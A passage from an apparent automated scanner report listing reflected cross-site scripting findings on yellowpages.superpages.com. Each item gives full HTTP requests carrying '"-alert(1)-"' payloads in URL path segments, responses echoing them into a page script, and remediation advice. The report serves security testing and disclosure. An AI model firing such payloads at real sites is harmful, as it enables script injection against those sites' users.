Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js1bae2&quot;-alert(1)-&quot;d1c4fd37467/csiframe.js
Server: Unspecified
Set-Cookie: JSESSIONID=4C4E33ECA8D5BE5099B80F0F1406B058; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:17 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.555. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd87"-alert(1)-"26871eafe34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/csiframe.js1dd87&quot;-alert(1)-&quot;26871eafe34
Server: Unspecified
Set-Cookie: JSESSIONID=9AFB68F58057118BE89F30825428352B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:27 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.556. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c75"-alert(1)-"933c529b5ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofileb3c75&quot;-alert(1)-&quot;933c529b5ba/js/hide.js
Server: Unspecified
Set-Cookie: JSESSIONID=A833574ACD90DE7C4B955F31362CD841; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:01 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.557. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de57b"-alert(1)-"653154b748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /busprofile/jsde57b"-alert(1)-"653154b748/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/jsde57b&quot;-alert(1)-&quot;653154b748/hide.js
Server: Unspecified
Set-Cookie: JSESSIONID=0A571CCB92825CFBE44F2D68AAF5D862; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:09 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/jsde57b"-alert(1)-"653154b748/hide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.558. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f72"-alert(1)-"1d6df26e138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/hide.js30f72&quot;-alert(1)-&quot;1d6df26e138
Server: Unspecified
Set-Cookie: JSESSIONID=EE8F07BABFC571B292CA39BD37E9CCCB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:20 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.559. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f5f"-alert(1)-"a4339366c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile41f5f&quot;-alert(1)-&quot;a4339366c19/js/photos.js
Server: Unspecified
Set-Cookie: JSESSIONID=FB668622B170916BD529AC461293019E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:04 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.560. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bda1"-alert(1)-"1e48a19052d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js9bda1&quot;-alert(1)-&quot;1e48a19052d/photos.js
Server: Unspecified
Set-Cookie: JSESSIONID=B2551730408681FE84948CBA5537D917; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:12 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.561. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aa7"-alert(1)-"ad045aaf68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/photos.js92aa7&quot;-alert(1)-&quot;ad045aaf68e
Server: Unspecified
Set-Cookie: JSESSIONID=8B974E034538B797392AD6254625C8BF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:22 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
lowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.562. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/script.more.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c0b"-alert(1)-"1189d0fb19e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile50c0b&quot;-alert(1)-&quot;1189d0fb19e/script.more.js
Server: Unspecified
Set-Cookie: JSESSIONID=E9DAEB1458FBC9F0B5240D898F7B6C6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:21 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.563. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/script.more.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696df"-alert(1)-"ae58cd1d73c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/script.more.js696df&quot;-alert(1)-&quot;ae58cd1d73c
Server: Unspecified
Set-Cookie: JSESSIONID=42E6EF654C25ED299F245617595471E5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:30 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.564. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e37"-alert(1)-"a77217be230 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /common27e37"-alert(1)-"a77217be230/css/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common27e37&quot;-alert(1)-&quot;a77217be230/css/forms.css
Server: Unspecified
Set-Cookie: JSESSIONID=DE3B6F76810C5748044659F1E3097E68; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common27e37"-alert(1)-"a77217be230/css/forms.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.565. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7342"-alert(1)-"107199becab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /common/cssf7342"-alert(1)-"107199becab/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssf7342&quot;-alert(1)-&quot;107199becab/forms.css
Server: Unspecified
Set-Cookie: JSESSIONID=65C38E08AACFCA247496A1F49E6DB041; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:36 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssf7342"-alert(1)-"107199becab/forms.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.566. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1c09"-alert(1)-"6f31add0046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /common/css/forms.cssf1c09"-alert(1)-"6f31add0046 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/forms.cssf1c09&quot;-alert(1)-&quot;6f31add0046
Server: Unspecified
Set-Cookie: JSESSIONID=0B17752584FF1A2DC3811629C5253765; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:44 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/forms.cssf1c09"-alert(1)-"6f31add0046?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.567. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

